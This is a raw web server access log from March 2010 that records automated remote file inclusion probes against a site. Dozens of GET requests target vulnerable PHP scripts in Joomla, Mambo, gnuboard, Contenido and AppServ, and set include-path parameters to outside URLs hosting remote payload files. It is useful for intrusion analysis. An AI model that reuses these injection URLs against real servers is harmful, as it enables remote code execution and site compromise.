87.106.132.3 - - [09/Mar/2010:17:47:57 -0800] "GET /components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:47:57 -0800] "GET /logs/access.log%20%20//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:47:57 -0800] "GET /logs//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:48:04 -0800] "GET /components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:48:04 -0800] "GET /logs//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:48:04 -0800] "GET /logs/access.log%20%20//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
99.57.90.154 - - [09/Mar/2010:17:48:28 -0800] "GET /components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
99.57.90.154 - - [09/Mar/2010:17:48:28 -0800] "GET /logs/access.log%20%20//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
99.57.90.154 - - [09/Mar/2010:17:48:28 -0800] "GET /logs//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
125.160.17.201 - - [09/Mar/2010:17:48:36 -0800] "GET /logs/access.log%20%20//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
125.160.17.201 - - [09/Mar/2010:17:48:36 -0800] "GET /logs//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
125.160.17.201 - - [09/Mar/2010:17:48:36 -0800] "GET /components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:54:42 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:54:44 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:54:48 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.239.227.209 - - [09/Mar/2010:17:57:26 -0800] "GET /include/admin.lib.inc.php//index2_051109.php?=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.239.227.209 - - [09/Mar/2010:17:57:31 -0800] "GET /logs//include/admin.lib.inc.php//index2_051109.php?=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.239.227.209 - - [09/Mar/2010:17:57:31 -0800] "GET /logs/access_100205.log//include/admin.lib.inc.php//index2_051109.php?=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:57:33 -0800] "GET /logs/access.log%20%20//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:57:34 -0800] "GET /components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:57:34 -0800] "GET /logs//components/com_login/libs/Blowfish/install.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:01:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:01:07 -0800] "GET /appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:01:09 -0800] "GET /logs/access_100205.log%20%20//appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.237.78.176 - - [09/Mar/2010:18:01:21 -0800] "GET /include/admin.lib.inc.php//index2_051109.php?=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.237.78.176 - - [09/Mar/2010:18:01:25 -0800] "GET /logs//include/admin.lib.inc.php//index2_051109.php?=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.237.78.176 - - [09/Mar/2010:18:01:25 -0800] "GET /logs/access_100205.log//include/admin.lib.inc.php//index2_051109.php?=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:01:56 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:01:56 -0800] "GET /appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:02:36 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:02:39 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:02:40 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:02:51 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:02:51 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:02:54 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:04:27 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.237.78.176 - - [09/Mar/2010:18:04:58 -0800] "GET /logs//include/admin.lib.inc.php//index2_051109.php?=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.237.78.176 - - [09/Mar/2010:18:04:59 -0800] "GET /logs/access_100205.log%20%20//include/admin.lib.inc.php//index2_051109.php?=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:06:54 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:06:54 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:06:55 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:06:55 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:18:08:19 -0800] "GET ///////?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 200 784 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:18:08:19 -0800] "GET /logs////////?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 200 1378 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:18:10:12 -0800] "GET ///////?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 200 784 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "smashfactory.net"
213.251.189.204 - - [09/Mar/2010:18:10:12 -0800] "GET /logs////////?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 200 1378 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "smashfactory.net"
222.231.49.223 - - [09/Mar/2010:18:12:16 -0800] "GET /logs/access.log//delete.php/?board_skin_path=http://4eye.co.kr//data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.231.49.223 - - [09/Mar/2010:18:12:16 -0800] "GET /delete.php/?board_skin_path=http://4eye.co.kr//data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
222.231.49.223 - - [09/Mar/2010:18:12:16 -0800] "GET /logs//delete.php/?board_skin_path=http://4eye.co.kr//data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:13:42 -0800] "GET /logs/access_100205.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:15:09 -0800] "GET /logs/access_100205.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:18:11 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:18:11 -0800] "GET /logs/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:18:11 -0800] "GET /logs/access_100205.log/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:18:14 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:18:14 -0800] "GET /logs/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:18:14 -0800] "GET /logs/access_100205.log/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:19:00 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:19:02 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:19:02 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:19:03 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:19:05 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:18:19:05 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:19:36 -0800] "GET /logs/access.log/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:19:45 -0800] "GET /logs/access.log/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:20:24 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:20:24 -0800] "GET /logs/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:20:24 -0800] "GET /logs/access_100205.log%20%20/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:20:26 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:20:26 -0800] "GET /logs/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:20:26 -0800] "GET /logs/access_100205.log%20%20/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
125.160.17.201 - - [09/Mar/2010:18:20:33 -0800] "GET /logs/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
125.160.17.201 - - [09/Mar/2010:18:20:33 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
125.160.17.201 - - [09/Mar/2010:18:20:33 -0800] "GET /logs/access_100205.log%20%20/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:22:06 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
125.160.17.201 - - [09/Mar/2010:18:25:25 -0800] "GET /logs/access.log%20%20/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:26:12 -0800] "GET /logs/access.log%20%20/bbs//write_update.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:26:54 -0800] "GET /logs/access_100205.log//appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:27:58 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
219.240.39.222 - - [09/Mar/2010:18:28:23 -0800] "GET /mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
219.240.39.222 - - [09/Mar/2010:18:28:23 -0800] "GET /logs/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
219.240.39.222 - - [09/Mar/2010:18:28:23 -0800] "GET /logs/access.log/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:33:34 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:34:54 -0800] "GET /logs/access_100205.log//appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:35:40 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.224.132.89 - - [09/Mar/2010:18:44:41 -0800] "GET /logs/access.log%20%20/e404.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.224.132.89 - - [09/Mar/2010:18:45:34 -0800] "GET /e404.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.224.132.89 - - [09/Mar/2010:18:45:51 -0800] "GET /logs/access_100205.log%20%20/e404.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.224.132.89 - - [09/Mar/2010:18:45:51 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:18:48:01 -0800] "GET /gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://art-investments.eu/id1???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:18:48:01 -0800] "GET /logs/access.log%20%20//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:18:48:01 -0800] "GET /logs//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:18:48:05 -0800] "GET /gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
24.162.212.123 - - [09/Mar/2010:18:48:52 -0800] "GET /_01_YZ_426_Manual.pdf HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.smashfactory.net"
24.162.212.123 - - [09/Mar/2010:18:48:52 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.smashfactory.net"
24.162.212.123 - - [09/Mar/2010:18:48:55 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:50:56 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:50:56 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:18:51:02 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:18:52:21 -0800] "GET /logs/access.log%20%20//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.224.132.89 - - [09/Mar/2010:18:52:40 -0800] "GET /logs/access_100205.log/e404.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:18:52:52 -0800] "GET /logs/access_100205.log%20%20//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:18:52:56 -0800] "GET /logs/access_100205.log%20%20//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:18:53:02 -0800] "GET /logs/access.log/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:18:53:02 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
